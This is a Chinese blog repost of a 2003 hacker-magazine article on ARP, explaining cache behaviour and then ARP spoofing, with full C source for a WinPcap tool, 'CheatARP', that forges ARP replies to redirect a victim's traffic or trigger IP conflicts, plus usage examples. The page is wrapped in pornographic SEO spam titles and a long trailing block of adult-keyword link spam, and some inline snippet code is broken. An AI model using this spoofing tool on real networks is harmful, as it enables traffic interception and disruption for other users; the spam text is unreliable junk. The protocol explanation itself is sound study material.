青青草原综合久久大伊人导航_色综合久久天天综合_日日噜噜夜夜狠狠久久丁香五月_热久久这里只有精品

mEjY的自由世界

眼界決定世界

ARP包的結構和發送【轉載】

最近要完成一個發送arp包的功能,以前沒做過封包發送的內容,查找了寫資料。不過看代碼,arp包的結構搞懂了,不知道為啥還要個頭,呵呵原來還要個以太網包頭。看來基礎知識還要加強啊,這里找了個寫的比較詳細的例子。

arp 欺騙的技術原理及應用<首發于黑客防線2003年11期>

WriteBy: LionD8

email:   LionD8@126.com

Wesite:   http://liond8.126.com

 

    你知道,數據包在局域網上是怎么傳輸的嗎?是靠什么來傳輸的嗎?也許你會說是靠IP地址,那么你只正確了一半。其實真正在傳輸過程中是靠計算機的網卡地址即MAC來傳輸。

   現在我們就用實例來模擬一下傳輸的全過程。現在有一臺計算機A(IP:192.168.85.1  MAC:AA-AA-AA-AA-AA-AA),另一臺計算機B(IP:192.168.85.100MAC:BB-BB-BB-BB-BB-BB)現在用A去 ping B。看見 Reply from 192.168.85.100:bytes=32 time<10ms TTL=32 這樣的信息。然后在運行中輸入arp -a,會看見 192.168.8.100 BB-BB-BB-BB-BB-BB dynamic這樣的信息。那就是arp高速緩存中IP地址和MAC地址的一個映射關系,在以太網中,數據傳遞靠的是MAC,而并不是IP地址。其實在這背后就隱藏著arp的秘密。你一定會問,網絡上這么多計算機,A是怎么找到B的?那么我們就來分析一下細節。首先A并不知道B在哪里,那么A首先就會發一個廣播的ARP請求,即目的MAC為FF-FF-FF-FF-FF-FF,目的IP為B的192.168.85.100,再帶上自己的源IP,和源MAC。那么一個網段上的所有計算機都會接收到來自A的ARP請求,由于每臺計算機都有自己唯一的MAC和IP,那么它會分析目的IP即192.168.85.100是不是自己的IP?如果不是,網卡會自動丟棄數據包。如果B接收到了,經過分析,目的IP是自己的,于是更新自己的ARP高速緩存,記錄下A的IP和MAC。然后B就會回應A一個ARP應答,就是把A的源IP,源MAC變成現在目的IP,和目的MAC,再帶上自己的源IP,源MAC,發送給A。當A機接收到ARP應答后,更新自己的ARP高速緩存,即把arp應答中的B機的源IP,源MAC的映射關系記錄在高速緩存中。那么現在A機中有B的MAC和IP,B機中也有A的MAC和IP。arp請求和應答過程就結束了。由于arp高速緩存是會定時自動更新的,在沒有靜態綁定的情況下,IP和MAC的映射關系會時間流逝自動消失。在以后的通信中,A在和B通信時,會首先察看arp高速緩存中有沒有B的IP和MAC的映射關系,如果有,就直接取得MAC地址,如果沒有就再發一次ARP請求的廣播,B再應答即重復上面動作。

   好了在了解了上面基本arp通信過程后,現在來學習arp欺騙技術就好理解多了,計算機在接收到ARP應答的時候,不管有沒有發出ARP請求,都會更新自己的高速緩存。利用這點如果C機(IP:192.168.85.200MAC:CC-CC-CC-CC-CC-CC)偽裝成B機向A發出ARP應答,自己偽造B機的源MAC為CC-CC-CC-CC-CC-CC,源IP依舊偽造成B的IP即192.168.85.100,是那么A機的ARP緩存就會被我們偽造的MAC所更新,192.168.85.100對應的MAC就會變成CC-CC-CC-CC-CC-CC.如果A機再利用192.168.85.100即B的IP和B通信,實際上數據包卻發給了C機,B機根本就接收不到了。

    下面給出一些程序實現的基本算法。先來給出ARP首部和請求應答的數據結構。如下:

 

以太網  | 以太網 | 幀  | 硬件 | 協議| 硬件 | 協議 | OP| 發送端   |發送端|目的以太|目的

目的地址| 源地址 | 類型| 類型 | 類型| 長度 | 長度 |   |以太網地址|  IP  |網地址  | IP

  6         6        2    2      2      1     1     2     6         4      6        4

|<---以太網首部---->|<-------------------28字節的ARP請求/應答------------->|

 

然后我們根據上面的數據結構定義兩個結構分別如下:

//定義一個以太網頭部

typedef struct ehhdr

{

    UCHAR    eh_dst[
6];        /* destination ethernet addrress */

    UCHAR    eh_src[
6];        /* source ethernet addresss */

    USHORT   eh_type;          
/* ethernet pachet type    */

}
EHHEADR, *PEHHEADR;

//28字節的ARP請求/應答

typedef struct arphdr

{

    USHORT    arp_hrd;            
/* format of hardware address */

    USHORT    arp_pro;            
/* format of protocol address */

    UCHAR     arp_hln;            
/* length of hardware address */

    UCHAR     arp_pln;            
/* length of protocol address */

    USHORT    arp_op;             
/* ARP/RARP operation */

    UCHAR     arp_sha[
6];         /* sender hardware address */

    ULONG     arp_spa;            
/* sender protocol address */

    UCHAR     arp_tha[
6];         /* target hardware address */

    ULONG     arp_tpa;            
/* target protocol address */

}
ARPHEADR, *PARPHEADR;

//把上面定義的兩種結構封裝起來

typedef struct arpPacket

{

    EHHEADR    ehhdr;

    ARPHEADR   arphdr;

}
 ARPPACKET, *PARPPACKET;

那么我們自己打造的ARP結構就完成了,剩下的事情就是把我們打造好的結構按照我們的需求賦上值,然后通過適配器發送出去就OK了。

    比如說我們要用C機,去欺騙A機,更新A的ARP緩存中192.168.85.100(B的IP)的MAC為C機的。

    首先定義一個ARPPACKET結構:

    ARPPACKET  ARPPacket;

    ARPPacket.ehhdr.eh_type=htons(0x0806);  //數據類型ARP請求或應答

       ARPPacket.arphdr.arp_hrd = htons(0x0001); //硬件地址為0x0001表示以太網地址

       ARPPacket.arphdr.arp_pro = htons(0x0800); //協議類型字段為0x0800表示IP地址

    ARPPacket.ehhdr.eh_dst=0xAAAAAAAAAAAA   //A機的MAC

    ARPPacket.ehhdr.eh_src=0xCCCCCCCCCCCC    //C機的源MAC

    ARPPacket.arphdr.arp_hln = 6;                  

       ARPPacket.arphdr.arp_pln = 4;

       ARPPacket.arphdr.arp_op = htons(0x0002);      //ARP應答值為2

    ARPPacket.arphdr.arp_spa = 0xCCCCCCCCCCCC //偽造的MAC,在這里C機用的自己的

    ARPPacket.arphdr.arp_tha = 0xAAAAAAAAAAAA //

    ARPPacket.arphdr.arp_spa =inet_addr("192.168.85.100");  //偽造B的IP地址

    ARPPacket.arphdr.arp_tpa = inet_addr("192.168.85.1");   //目標A的IP地址

//把要發送的數據保存在一個緩沖區szPacketBuf中,到時候只要把szPacketBuf的數據發送出去就可以了。

memcpy(szPacketBuf, (char*)&ARPPacket, sizeof(ARPPacket));

要發送數據,首先得打開一個適配器,打開一個適配器又需要先獲得適配器的名字。如下:

PacketGetAdapterNames((char*)AdapterName, &AdapterLength); //取得所有適配器的名字.

 

LPPACKET lpAdapter =PacketOpenAdapter((LPTSTR) AdapterList[0]); //打開第一塊適配器

第一塊的下標是從0開始的。返回一個指針,它指向一個正確初始化了的ADAPTER Object

 

lpPacket = PacketAllocatePacket(); //為_PACKET結構分配內存。

PacketInitPacket(lpPacket, szPacketBuf, 60); //packet結構中的buffer設置為傳遞的szPacketBuf指針

PacketSetNumWrites(lpAdapter, 2); //設置發送次數為2次

//一切就緒發送:

PacketSendPacket(lpAdapter, lpPacket, TRUE); //通過打開的適配器把szPacketBuf的數據發送出去。

PacketFreePacket(lpPacket);         //釋放_PACKET結構

PacketCloseAdapter(lpAdapter);      //關閉適配器

然后 在A機上的運行中輸入arp -a 會發現原來的 192.168.85.100 BB-BB-BB-BB-BB-BB

變成 192.168.85.100 CC-CC-CC-CC-CC-CC 了。

   另外利用ARP欺騙還可以進行IP沖突,網絡執行官就是利用的這個原理,下面只簡單介紹一下,如果A機接收到一個ARP應答,其中源IP是192.168.85.1(當然是偽造的),而MAC地址卻和A的MAC不同,那么A機就會認為同一個IP對應了兩臺計算機(因為發現了兩個不同的MAC地址)

那么就會出現IP沖突。

CheatARP <desIP> <desMac> <sourceIP> <sourceMac>

比如利用我做的工具:CheatARP 192.168.85.1 AAAAAAAAAAAA 192.168.85.1 BAAAAAAAAAAAA  那么A就會被沖突。

    以上只是代碼實現的基本思路和核心代碼,有興趣的朋友可以看看我的源碼,源碼上也有比較詳盡的注釋。

 

 

源代碼:

/*

ARP 的欺騙的技術原理及應用

請先安裝 WinPcap_3_0_a.exe

測試環境2k。

實用平臺 NT,2K,XP

*/


#include 
"stdio.h"

#include 
"Packet32.h"

#include 
"wchar.h"

#define EPT_IP 
0x0800 /* type: IP */

#define EPT_ARP 
0x0806 /* type: ARP */

#define EPT_RARP 
0x8035 /* type: RARP */

#define ARP_HARDWARE 
0x0001 /* Dummy type for 802.3 frames */

#define ARP_REQUEST 
0x0001 /* ARP request */

#define ARP_REPLY 
0x0002 /* ARP reply */

#pragma comment(lib, 
"packet.lib")

#pragma comment(lib, 
"ws2_32.lib")

#pragma pack(push, 
1)

//定義一個以太網頭部

typedef struct ehhdr

{

UCHAR eh_dst[
6]; /* destination ethernet addrress */

UCHAR eh_src[
6]; /* source ethernet addresss */

USHORT eh_type; 
/* ethernet pachet type */

}
EHHEADR, *PEHHEADR;

//定義一個28字節的arp應答/請求

typedef struct arphdr

{

USHORT arp_hrd; 
/* format of hardware address */

USHORT arp_pro; 
/* format of protocol address */

UCHAR arp_hln; 
/* length of hardware address */

UCHAR arp_pln; 
/* length of protocol address */

USHORT arp_op; 
/* ARP/RARP operation */

UCHAR arp_sha[
6]; /* sender hardware address */

ULONG arp_spa; 
/* sender protocol address */

UCHAR arp_tha[
6]; /* target hardware address */

ULONG arp_tpa; 
/* target protocol address */

}
ARPHEADR, *PARPHEADR;

//把上面定義的兩種結構封裝起來

typedef struct arpPacket

{

EHHEADR ehhdr;

ARPHEADR arphdr;

}
 ARPPACKET, *PARPPACKET;

#pragma pack(pop)

void Usage();

void ChangeMacAddr(char *p, UCHAR a[]); 

void banner();

int main(int argc, char* argv[])

{

static CHAR AdapterList[10][1024]; 

TCHAR szPacketBuf[
512];

UCHAR MacAddr[
6];

LPADAPTER lpAdapter;

LPPACKET lpPacket;

WCHAR AdapterName[
2048];

WCHAR 
*temp,*temp1;

ARPPACKET ARPPacket;

ULONG AdapterLength 
= 1024;

DWORD AdapterNum 
= 0;

DWORD nRetCode, i;

banner(); 

if(argc!=5)

{

Usage();

return 0;

}
 

//取得所有適配器的名字.

if(PacketGetAdapterNames((char*)AdapterName, &AdapterLength) == FALSE)

{

//AdapterName:一塊用戶負責分配的緩沖區,將把適配器的名字填充進去,

//一串用一個Unicode的"0"分隔的Unicode字符串,每一個都是一個網卡的名字

//AdapterLength:這塊緩沖區的大小

printf(
"Unable to retrieve the list of the adapters!");

return 0;

}


temp 
= AdapterName;

temp1
=AdapterName;

= 0;

//把AdapterName中的適配器,分個copy到AdapterList[]中,i從0開始為第一個

while ((*temp != '0')||(*(temp-1!= '0'))

{

if (*temp == '0')

{

memcpy(AdapterList[i],temp1,(temp
-temp1)*sizeof(WCHAR));

temp1
=temp+1;

i
++;

}


temp
++;

}


AdapterNum 
= i;

for (i = 0; i < AdapterNum; i++)

wprintf(L
"%d- %s", i+1, AdapterList[i]);

/* 注意,在這里一定要選擇正確的適配器不然會自動重起 */

/* 我機器上的是 */

/* 1- _NdisWanIp */

/* 2- _{02C36709-5318-4861-86DE-A7A81118BFCC} */

/* 選擇類似第2項的那種 一定要注意哦! */ 

printf(
"select adapter number:");

scanf(
"%d",&i); //我是輸入的2 

if(i>AdapterNum)

{

printf(
"Number error!");

return 0;

}


//打開剛剛選擇的那個適配器,AdapterList[i-1]為適配器名字

//如果打開成功,返回一個指針,它指向一個正確初始化了的ADAPTER Object。否則,返回NULL。

lpAdapter 
= (LPADAPTER) PacketOpenAdapter((LPTSTR) AdapterList[i-1]); 

if (!lpAdapter || (lpAdapter->hFile == INVALID_HANDLE_VALUE))

{

nRetCode 
= GetLastError();

printf(
"Unable to open the driver, Error Code : %lx", nRetCode);

return 0;

}


//為_PACKET結構分配內存。如果執行成功,返回指向_PACKET結構的指針。否則,返回NULL。

lpPacket 
= PacketAllocatePacket();

if(lpPacket == NULL)

{

printf(
":failed to allocate the LPPACKET structure.");

return 0;

}


memset(szPacketBuf, 
0, sizeof(szPacketBuf)); //初始化szPacketBuf為0

ChangeMacAddr(argv[
2], MacAddr); //MAC地址轉換

memcpy(ARPPacket.ehhdr.eh_dst, MacAddr, 
6); //目的MAC地址

ChangeMacAddr(argv[
4], MacAddr); //MAC地址轉換

memcpy(ARPPacket.ehhdr.eh_src, MacAddr, 
6); //源MAC地址。

ARPPacket.ehhdr.eh_type 
= htons(EPT_ARP); //數據類型ARP請求或應答

ARPPacket.arphdr.arp_hrd 
= htons(ARP_HARDWARE); //硬件地址為0x0001表示以太網地址

ARPPacket.arphdr.arp_pro 
= htons(EPT_IP); //協議類型字段為0x0800表示IP地址

//硬件地址長度和協議地址長度分別指出硬件地址和協議地址的長度,

//以字節為單位。對于以太網上IP地址的ARP請求或應答來說,它們的值分別為6和4。

ARPPacket.arphdr.arp_hln 
= 6

ARPPacket.arphdr.arp_pln 
= 4;

ARPPacket.arphdr.arp_op 
= htons(ARP_REPLY); //ARP請求值為1,ARP應答值為2,RARP請求值為3,RARP應答值為4

ChangeMacAddr(argv[
4], MacAddr); //MAC地址轉換

memcpy(ARPPacket.arphdr.arp_sha, MacAddr, 
6); //偽造的MAC地址

ARPPacket.arphdr.arp_spa 
= inet_addr(argv[3]); //偽造的IP地址

ChangeMacAddr(argv[
2], MacAddr); //MAC地址轉換

memset(ARPPacket.arphdr.arp_tha,
0,6); //初始化0

memcpy(ARPPacket.arphdr.arp_tha , MacAddr, 
6); //目標的MAC地址 

ARPPacket.arphdr.arp_tpa 
= inet_addr(argv[1]); //目標的IP地址

//把剛剛自己偽造的ARPPACKET結構復制到szPacketBuf中

memcpy(szPacketBuf, (
char*)&ARPPacket, sizeof(ARPPacket));

//初始化一個_PACKET結構,即將packet結構中的buffer設置為傳遞的szPacketBuf指針。

//lpPacket,指向一個_PACKET結構的指針。

//szPacketBuf,一個指向一塊用戶分配的緩沖區的指針。

//60,緩沖區的大小。這是一個讀操作從driver傳遞到應用的最大數據量。

PacketInitPacket(lpPacket, szPacketBuf, 
60);

//設置發送次數2次

if(PacketSetNumWrites(lpAdapter, 2)==FALSE)

{

printf(
"warning: Unable to send more than one packet in a single write!");

}


//發送剛剛偽造的數據包

if(PacketSendPacket(lpAdapter, lpPacket, TRUE)==FALSE)

{

printf(
"Error sending the packets!");

return 0;

}


printf (
"Send ok!");

PacketFreePacket(lpPacket); 
//釋放_PACKET結構

PacketCloseAdapter(lpAdapter); 
//關閉適配器

return 0;

}


void Usage()

{

printf(
"CheatARP <DstIP> <DstMAC> <SourceIP> <SourceMAC>");

printf(
"Such as:");

printf(
"CheatARP 192.168.85.1 FFFFFFFFFFFF 192.168.85.129 005056E9D042");

printf(
"CheatARP 192.168.85.1 005056E9D041 192.168.85.129 AAAAAAAAAAAA");

}


//把輸入的12字節的MAC字符串,轉變為6字節的16進制MAC地址

void ChangeMacAddr(char *p, UCHAR a[])

{

char* p1=NULL;

int i=0;

int high ,low;

char temp[1];

for (i=0; i<6; i++)

{

p1
=p+1;

switch (*p1) //計算低位的16進進制

{

case 'A': low=10;

break;

case 'B': low=11;

break;

case 'C': low=12;

break;

case 'D': low=13;

break;

case 'E': low=14;

break;

case 'F': low=15;

break;

default: temp[0]=*p1;

low
=atoi(temp); //如果為數字就直接轉變成對應的數值

}


switch (*p) //計算高位的16進制

{

case 'A': high=10;

break;

case 'B': high=11;

break;

case 'C': high=12;

break;

case 'D': high=13;

break;

case 'E': high=14;

break;

case 'F': high=15;

break;

default: temp[0]=*p;

high
=atoi(temp); //如果為數字就直接轉變成對應的數值

}


p
+=2//指針指向下一個X(高)X(低)字符串

a[i]
=high*16+low; //求和得16進制值

}


}


void banner()

{

printf(
"Made By LionD8.");

printf(
"www.hackerXfiles.com");

}


如轉載:請說明作者信息,表明首發刊物。

posted on 2007-09-26 14:07 mEjY 閱讀(11190) 評論(1)  編輯 收藏 引用

評論

# re: ARP包的結構和發送【轉載】 2008-04-29 15:48 過路者

不錯  回復  更多評論   

<2025年9月>
31123456
78910111213
14151617181920
21222324252627
2829301234
567891011

導航

統計

常用鏈接

留言簿(1)

隨筆檔案

文章分類

文章檔案

搜索

最新評論

閱讀排行榜

評論排行榜

青青草原综合久久大伊人导航_色综合久久天天综合_日日噜噜夜夜狠狠久久丁香五月_热久久这里只有精品
  • <ins id="pjuwb"></ins>
    <blockquote id="pjuwb"><pre id="pjuwb"></pre></blockquote>
    <noscript id="pjuwb"></noscript>
          <sup id="pjuwb"><pre id="pjuwb"></pre></sup>
            <dd id="pjuwb"></dd>
            <abbr id="pjuwb"></abbr>
            亚洲综合成人婷婷小说| 午夜久久久久久久久久一区二区| 欧美激情精品久久久久久免费印度| 久久免费高清| 久久精品视频免费观看| 久久精品国产欧美激情| 久久精品国产v日韩v亚洲| 久久久久九九九九| 欧美α欧美αv大片| 亚洲国产精品一区| 亚洲国产精品嫩草影院| 99re热精品| 亚洲欧美在线一区二区| 久久免费视频在线| 欧美日韩第一区日日骚| 国产日韩欧美在线播放不卡| 亚洲第一狼人社区| 亚洲综合国产| 免费成人高清视频| 在线亚洲自拍| 久久综合网络一区二区| 国产精品久久久久久久久久妞妞 | 亚洲国内自拍| 亚洲视频国产视频| 久久在线视频在线| 国产精品欧美经典| 亚洲欧洲美洲综合色网| 欧美一区2区视频在线观看 | 午夜视频精品| 亚洲高清视频一区| 久久精品91| 欧美性猛交xxxx乱大交蜜桃| 精品电影在线观看| 性欧美xxxx视频在线观看| 亚洲激情自拍| 久久久欧美精品sm网站| 国产精品视频福利| 中日韩男男gay无套| 免费观看久久久4p| 久久久久国产精品麻豆ai换脸| 欧美岛国在线观看| 国内精品久久久| 欧美中文字幕在线视频| 中文在线资源观看网站视频免费不卡 | 欧美国产亚洲视频| 国产尤物精品| 欧美一区二区三区电影在线观看| 亚洲激情在线| 欧美大片免费久久精品三p| 一区精品在线| 久久久久www| 日韩亚洲不卡在线| 一本久久综合亚洲鲁鲁| 欧美成人三级在线| 亚洲人妖在线| 免费不卡在线视频| 久久久久亚洲综合| 激情久久综合| 欧美va亚洲va国产综合| 久久久久欧美精品| 亚洲国产另类久久久精品极度| 久久综合网色—综合色88| 久久爱另类一区二区小说| 国产亚洲精品高潮| 久久久久久久性| 久久久久久黄| 亚洲丰满少妇videoshd| 亚洲成人在线免费| 一本色道88久久加勒比精品| 欧美欧美午夜aⅴ在线观看| 亚洲精品在线免费| 日韩亚洲欧美成人| 国产精品色午夜在线观看| 欧美一区永久视频免费观看| 欧美亚洲综合在线| 亚洲国产欧美久久| 亚洲伦伦在线| 国产午夜精品久久久久久免费视| 久久三级视频| 欧美日本一区二区视频在线观看| 在线视频免费在线观看一区二区| 亚洲视频综合在线| 国产综合色一区二区三区| 欧美华人在线视频| 国产精品v日韩精品v欧美精品网站| 小嫩嫩精品导航| 久久综合久久综合这里只有精品| 99视频日韩| 欧美伊人影院| 一本大道久久精品懂色aⅴ| 亚洲素人一区二区| 亚洲国产婷婷| 亚洲一区二区三区四区五区午夜| 国产亚洲欧美日韩一区二区| 欧美a级片一区| 欧美午夜激情小视频| 美女诱惑一区| 国产精品日韩在线播放| 免费欧美网站| 国产精品综合不卡av| 亚洲成人在线视频播放| 欧美日韩在线三级| 久久综合五月| 国产噜噜噜噜噜久久久久久久久 | 欧美亚洲免费高清在线观看| 久久精品成人| 亚洲一区亚洲二区| 久热成人在线视频| 欧美在线高清| 欧美日韩精品一二三区| 免费看的黄色欧美网站| 国产日本欧美一区二区三区在线| 亚洲国产天堂久久综合网| 国产一区二区av| 亚洲午夜久久久久久久久电影院 | 国内精品久久久| 一本色道久久综合亚洲精品小说| 亚洲国产国产亚洲一二三| 欧美在线亚洲一区| 午夜久久影院| 国产精品成人一区二区艾草| 亚洲电影在线| 亚洲第一天堂av| 久久精品人人做人人爽| 欧美在线亚洲一区| 国产精品在线看| 亚洲伊人第一页| 午夜影院日韩| 国产精品毛片a∨一区二区三区| 亚洲人成久久| 99亚洲一区二区| 欧美精品久久久久久久| 亚洲国产高清aⅴ视频| 亚洲高清在线精品| 久热re这里精品视频在线6| 老司机一区二区| 在线日韩欧美视频| 噜噜爱69成人精品| 欧美国产日本高清在线| 亚洲欧洲精品一区二区精品久久久 | 欧美成人免费网| 亚洲国产一区二区三区青草影视| 久久久久看片| 亚洲盗摄视频| 一本久久综合| 国产精品入口日韩视频大尺度| 亚洲视频综合| 久久久久在线观看| 亚洲电影视频在线| 欧美大片免费看| 这里只有精品视频| 久久黄色网页| 亚洲福利视频网| 欧美日韩黄色一区二区| 这里只有精品在线播放| 欧美专区第一页| 亚洲国产裸拍裸体视频在线观看乱了中文| 久久综合九色| 洋洋av久久久久久久一区| 欧美中文字幕在线播放| 136国产福利精品导航| 欧美日韩高清在线播放| 欧美亚洲三级| 亚洲欧洲日夜超级视频| 午夜精品理论片| 在线播放一区| 欧美视频久久| 久久久久一本一区二区青青蜜月| 亚洲女性裸体视频| 一卡二卡3卡四卡高清精品视频| av不卡在线| 亚洲欧美电影院| 国产日产精品一区二区三区四区的观看方式 | 久久精品视频播放| 亚洲丰满在线| 国产精品视频一区二区高潮| 久久激情网站| 夜夜躁日日躁狠狠久久88av| 久久视频在线免费观看| 亚洲天堂av在线免费观看| 一区精品久久| 国产精品一二三| 欧美高清视频一区二区| 欧美一区二区女人| 99re6这里只有精品| 欧美大片专区| 久久久久久久一区二区三区| 9色国产精品| 亚洲精品1区2区| 国产一区二区三区在线观看精品 | 日韩天天综合| 国外精品视频| 国产精品入口麻豆原神| 欧美黄色片免费观看| 久久久精品国产免大香伊| 亚洲在线观看视频网站| 在线视频你懂得一区二区三区| 亚洲国产成人av好男人在线观看| 久久久久久久网| 久久国产黑丝|